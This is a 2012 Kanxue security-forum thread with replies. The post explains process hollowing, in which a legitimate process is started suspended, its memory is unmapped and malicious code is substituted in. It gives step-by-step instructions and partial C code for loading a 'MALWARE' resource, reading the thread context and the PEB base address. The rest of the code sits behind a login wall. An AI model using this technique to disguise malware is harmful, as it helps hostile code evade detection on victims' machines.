[原创]进程替换-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]进程替换

发表于: 2012-7-17 00:19 58660

[原创]进程替换

wmbol

2012-7-17 00:19

58660

本文的进程替换是指将正在运行的程序的内存空间用恶意代码替换掉. 如果被替换的进程是合法的进程, 那么恶意代码可以披着合法的外衣干坏事了. 当然坏事干多了还是会被发现的.

替换的过程如下:
1. 创建一个挂起状态(SUSPEND)的进程, 此时进程的主线程还未开始运行.
2. 读取主线程的上下文(CONTEXT), 并读取新创建进程的基址.
3. 使用NtUnmapViewOfSection将新创建的进程的内存空间释放掉, 随后可以开始填充恶意代码.
4. 设置主线程的上下文, 启动主线程.

一. 我将恶意代码当成资源文件, 所以先将资源文件加载到内存中.

  LPVOID ExtractRes(HMODULE hModule)
  {
    HRSRC hResInfo;
    HGLOBAL hResData;
    LPVOID lpResLock;
    DWORD dwSize;
    LPVOID lpAddr;

    hResInfo = FindResource(hModule, MAKEINTRESOURCE(101), _T("MALWARE"));
    hResData = LoadResource(hModule, hResInfo);
    lpResLock = LockResource(hResData);
    dwSize = SizeofResource(hModule, hResInfo);
    lpAddr = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(lpAddr, lpResLock, dwSize);

    return lpAddr;
  }

  STARTUPINFO si;
  PROCESS_INFORMATION pi;

  ZeroMemory(&si, sizeof(si));
  si.cb = sizeof(si);
  ZeroMemory(&pi, sizeof(pi));
  if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,  NULL, NULL,  &si, &pi) == 0)
  {
    return -1;
  }

  CONTEXT context;
  context.ContextFlags = CONTEXT_FULL;
  if (GetThreadContext(pi.hThread, &context) == 0)
  {
    return -1;
  }

  // EBX points to PEB, offset 8 is the pointer to the base address
  if (ReadProcessMemory(pi.hProcess, (LPCVOID)(context.Ebx + 8), &dwVictimBaseAddr, sizeof(PVOID), NULL) == 0)
  {
    return -1;
  }

登录后可查看完整内容

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！

上传的附件：

MalwareAnalysis.7z （9.36kb，1182次下载）

收藏・223

免费・8

支持

最新回复 (96) 1 2 3 4 ▶
lylxd 雪币： 5199 活跃值： (3437) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 253 粉丝 1 关注私信	lylxd 2 楼收藏～ 2012-7-17 02:39 0
封心锁爱雪币： 239 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 170 粉丝 1 关注私信	封心锁爱 3 楼 Make，收藏 2012-7-17 08:40 0
z许雪币： 1895 活跃值： (1657) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 266 粉丝 4 关注私信	z许 4 楼好帖。 2012-7-17 09:35 0
choday 雪币： 239 活跃值： (190) 能力值： ( LV8，RANK：130 ) 在线值：发帖 58 回帖 405 粉丝 3 关注私信	choday 2 5 楼不行的吧，dll加载呢，还有重定位，以及资源文件需要处理呢 2012-7-17 10:02 0
Artmiss 雪币： 19 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 69 粉丝 1 关注私信	Artmiss 6 楼如果是直接写ShellCode是不会存在问题的，但是如果要想些pe文件，就需要进行重定位等的修复了 2012-7-17 10:09 0
woaipj 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	woaipj 7 楼好东西。先收藏了。 2012-7-17 10:30 0
雪yaojun 雪币： 120 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 593 粉丝 0 关注私信	雪yaojun 8 楼以前很多病毒用这傀儡进程的技术的。。不过还在编译的时候就被报毒了。 2012-7-17 10:34 0
wmbol 雪币： 2120 活跃值： (73) 能力值： ( LV4，RANK：50 ) 在线值：发帖 15 回帖 302 粉丝 1 关注私信	wmbol 1 9 楼当我CreateProcess指定的Flag是CREATE_SUSPENDED, 此时DLL加载, 重定位等等过程还没有开始. 而我已经将进程都替换掉了 2012-7-17 10:50 0
zgyknight 雪币： 2 活跃值： (199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 10 楼 mark~~~~~~~~~~~~ 2012-7-17 10:56 0
wmbol 雪币： 2120 活跃值： (73) 能力值： ( LV4，RANK：50 ) 在线值：发帖 15 回帖 302 粉丝 1 关注私信	wmbol 1 11 楼可以参考一下windows internals, chapter 5, Flow of CreateProcess http://115.com/file/beoa6a04 2012-7-17 10:57 0
cnbragon 雪币： 3686 活跃值： (1036) 能力值： (RANK：760 ) 在线值：发帖 48 回帖 802 粉丝 9 关注私信	cnbragon 18 12 楼不错，很多木马都使用这种技术 2012-7-17 11:29 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 13 楼很古老了,N年前灰鸽子这样用过 2012-7-17 11:44 0
代码疯子雪币： 270 活跃值： (97) 能力值： ( LV8，RANK：140 ) 在线值：发帖 22 回帖 423 粉丝 1 关注私信	代码疯子 3 14 楼的确是很老了 2012-7-17 13:00 0
cntrump 雪币： 1708 活跃值： (586) 能力值： ( LV15，RANK：670 ) 在线值：发帖 204 回帖 2062 粉丝 19 关注私信	cntrump 13 15 楼一释放就被干掉了，过不了特征查杀，过不了主防。只能学习。 2012-7-17 13:45 0
superleft 雪币： 169 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 63 粉丝 0 关注私信	superleft 16 楼年娇处！图森破！ 2012-7-17 13:52 0
xSpy 雪币： 138 活跃值： (306) 能力值： ( LV8，RANK：130 ) 在线值：发帖 10 回帖 86 粉丝 1 关注私信	xSpy 2 17 楼 ....,..几百万年前的代码了,这都精华 2012-7-17 14:26 0
wawadj 雪币： 1700 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 18 粉丝 0 关注私信	wawadj 18 楼不错的方法，学习了 2012-7-17 17:52 0
xPLK 雪币： 375 活跃值： (12) 能力值： ( LV8，RANK：130 ) 在线值：发帖 18 回帖 705 粉丝 0 关注私信	xPLK 3 19 楼确实，很灰鸽子的感觉。 2012-7-17 18:55 0
不bui 雪币： 113 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	不bui 20 楼 Mark,收藏 2012-7-17 19:19 0
yuansunxue 雪币： 1024 活跃值： (240) 能力值： ( LV12，RANK：310 ) 在线值：发帖 26 回帖 267 粉丝 1 关注私信	yuansunxue 6 21 楼这个标题太吸引人了 2012-7-17 20:56 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 22 楼学习一下看来还有很多东西要学啊 2012-7-17 22:48 0
skyercao 雪币： 114 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 24 粉丝 0 关注私信	skyercao 23 楼学习~ 不过就算释放的时候不被杀到写入的时候一样会被主动防御提示~ 2012-7-18 09:23 0
choday 雪币： 239 活跃值： (190) 能力值： ( LV8，RANK：130 ) 在线值：发帖 58 回帖 405 粉丝 3 关注私信	choday 2 24 楼经过我的测试，创建是使用suspend参数，只加载了两个dll,ntdll.dll和kernal32.dll 但是一但程序使用manifest，那么，就有可能会出问题。尤其是使用了vs中的一些运行库。不好意思，manifest指定的库不能正确回到进来，加载进来的是原来的pe文件的库这里把我写的测试代码发上来 ReplaceProcess.rar 上传的附件： ReplaceProcess.rar （146.86kb，194次下载） 2012-7-18 11:07 0
Naylon 雪币： 227 活跃值： (66) 能力值： ( LV7，RANK：100 ) 在线值：发帖 4 回帖 147 粉丝 2 关注私信	Naylon 2 25 楼 EXE注入比较老了，不过lz代码写得还是很好的~收藏了~ 2012-7-18 14:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

wmbol

发帖

302

回帖

RANK

关注

私信

他的文章

[招聘]支付宝招聘高级iOS工程师 6595
[原创]远程注入dll 10937

关于我们

联系我们

企业服务

看雪公众号

最新回复 (96) 1 2 3 4 ▶
lylxd 雪币： 5199 活跃值： (3437) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 253 粉丝 1 关注私信	lylxd 2 楼收藏～ 2012-7-17 02:39 0
封心锁爱雪币： 239 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 170 粉丝 1 关注私信	封心锁爱 3 楼 Make，收藏 2012-7-17 08:40 0
z许雪币： 1895 活跃值： (1657) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 266 粉丝 4 关注私信	z许 4 楼好帖。 2012-7-17 09:35 0
choday 雪币： 239 活跃值： (190) 能力值： ( LV8，RANK：130 ) 在线值：发帖 58 回帖 405 粉丝 3 关注私信	choday 2 5 楼不行的吧，dll加载呢，还有重定位，以及资源文件需要处理呢 2012-7-17 10:02 0
Artmiss 雪币： 19 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 69 粉丝 1 关注私信	Artmiss 6 楼如果是直接写ShellCode是不会存在问题的，但是如果要想些pe文件，就需要进行重定位等的修复了 2012-7-17 10:09 0
woaipj 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	woaipj 7 楼好东西。先收藏了。 2012-7-17 10:30 0
雪yaojun 雪币： 120 活跃值： (160) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 593 粉丝 0 关注私信	雪yaojun 8 楼以前很多病毒用这傀儡进程的技术的。。不过还在编译的时候就被报毒了。 2012-7-17 10:34 0
wmbol 雪币： 2120 活跃值： (73) 能力值： ( LV4，RANK：50 ) 在线值：发帖 15 回帖 302 粉丝 1 关注私信	wmbol 1 9 楼当我CreateProcess指定的Flag是CREATE_SUSPENDED, 此时DLL加载, 重定位等等过程还没有开始. 而我已经将进程都替换掉了 2012-7-17 10:50 0
zgyknight 雪币： 2 活跃值： (199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 31 回帖 194 粉丝 0 关注私信	zgyknight 10 楼 mark~~~~~~~~~~~~ 2012-7-17 10:56 0
wmbol 雪币： 2120 活跃值： (73) 能力值： ( LV4，RANK：50 ) 在线值：发帖 15 回帖 302 粉丝 1 关注私信	wmbol 1 11 楼可以参考一下windows internals, chapter 5, Flow of CreateProcess http://115.com/file/beoa6a04 2012-7-17 10:57 0
cnbragon 雪币： 3686 活跃值： (1036) 能力值： (RANK：760 ) 在线值：发帖 48 回帖 802 粉丝 9 关注私信	cnbragon 18 12 楼不错，很多木马都使用这种技术 2012-7-17 11:29 0
evilkis 雪币： 596 活跃值： (449) 能力值： ( LV12，RANK：320 ) 在线值：发帖 15 回帖 509 粉丝 8 关注私信	evilkis 7 13 楼很古老了,N年前灰鸽子这样用过 2012-7-17 11:44 0
代码疯子雪币： 270 活跃值： (97) 能力值： ( LV8，RANK：140 ) 在线值：发帖 22 回帖 423 粉丝 1 关注私信	代码疯子 3 14 楼的确是很老了 2012-7-17 13:00 0
cntrump 雪币： 1708 活跃值： (586) 能力值： ( LV15，RANK：670 ) 在线值：发帖 204 回帖 2062 粉丝 19 关注私信	cntrump 13 15 楼一释放就被干掉了，过不了特征查杀，过不了主防。只能学习。 2012-7-17 13:45 0
superleft 雪币： 169 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 63 粉丝 0 关注私信	superleft 16 楼年娇处！图森破！ 2012-7-17 13:52 0
xSpy 雪币： 138 活跃值： (306) 能力值： ( LV8，RANK：130 ) 在线值：发帖 10 回帖 86 粉丝 1 关注私信	xSpy 2 17 楼 ....,..几百万年前的代码了,这都精华 2012-7-17 14:26 0
wawadj 雪币： 1700 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 18 粉丝 0 关注私信	wawadj 18 楼不错的方法，学习了 2012-7-17 17:52 0
xPLK 雪币： 375 活跃值： (12) 能力值： ( LV8，RANK：130 ) 在线值：发帖 18 回帖 705 粉丝 0 关注私信	xPLK 3 19 楼确实，很灰鸽子的感觉。 2012-7-17 18:55 0
不bui 雪币： 113 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 78 粉丝 0 关注私信	不bui 20 楼 Mark,收藏 2012-7-17 19:19 0
yuansunxue 雪币： 1024 活跃值： (240) 能力值： ( LV12，RANK：310 ) 在线值：发帖 26 回帖 267 粉丝 1 关注私信	yuansunxue 6 21 楼这个标题太吸引人了 2012-7-17 20:56 0
mumaren 雪币： 71 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 48 回帖 659 粉丝 0 关注私信	mumaren 22 楼学习一下看来还有很多东西要学啊 2012-7-17 22:48 0
skyercao 雪币： 114 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 24 粉丝 0 关注私信	skyercao 23 楼学习~ 不过就算释放的时候不被杀到写入的时候一样会被主动防御提示~ 2012-7-18 09:23 0
choday 雪币： 239 活跃值： (190) 能力值： ( LV8，RANK：130 ) 在线值：发帖 58 回帖 405 粉丝 3 关注私信	choday 2 24 楼经过我的测试，创建是使用suspend参数，只加载了两个dll,ntdll.dll和kernal32.dll 但是一但程序使用manifest，那么，就有可能会出问题。尤其是使用了vs中的一些运行库。不好意思，manifest指定的库不能正确回到进来，加载进来的是原来的pe文件的库这里把我写的测试代码发上来 ReplaceProcess.rar 上传的附件： ReplaceProcess.rar （146.86kb，194次下载） 2012-7-18 11:07 0
Naylon 雪币： 227 活跃值： (66) 能力值： ( LV7，RANK：100 ) 在线值：发帖 4 回帖 147 粉丝 2 关注私信	Naylon 2 25 楼 EXE注入比较老了，不过lz代码写得还是很好的~收藏了~ 2012-7-18 14:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复